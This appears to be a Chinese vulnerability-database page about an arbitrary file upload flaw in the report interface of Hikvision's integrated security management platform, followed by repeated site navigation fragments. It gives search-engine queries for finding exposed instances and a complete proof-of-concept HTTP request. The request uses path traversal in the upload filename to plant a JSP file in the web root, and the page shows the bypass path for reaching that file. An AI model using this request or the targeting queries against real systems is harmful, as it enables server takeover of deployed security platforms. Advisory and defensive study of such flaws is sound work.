Hikvision 综合安防管理平台 report 任意文件上传漏洞

漏洞描述

Hikvision 综合安防管理平台 report接口存在任意文件上传漏洞，攻击者通过构造特殊的请求包可以上传任意文件，获取服务器权限

漏洞影响

Hikvision 综合安防管理平台

网络测绘

app="Hikvision-综合安防管理平台"

web.title=="综合安防管理平台"

漏洞复现

登陆页面

WEB-INF/classes/com/Hikvision/svm/controller/ExternalController.class

WEB-INF/classes/com/Hikvision/svm/business/serivce/impl/ExternalBusinessServiceImpl.class

构造上传文件（通过 env泄漏获取绝对路径，路径一般不会修改）

POST /svm/api/external/report HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/Hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test");%>

------WebKitFormBoundary9PggsiM755PLa54a--

/portal/ui/login/..;/..;/new.jsp

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

Hikvision 综合安防管理平台 report 任意文件上传漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

Hikvision 综合安防管理平台 report 任意文件上传漏洞 ​

漏洞描述 ​

漏洞影响 ​

网络测绘 ​

漏洞复现 ​

Hikvision 综合安防管理平台 report 任意文件上传漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现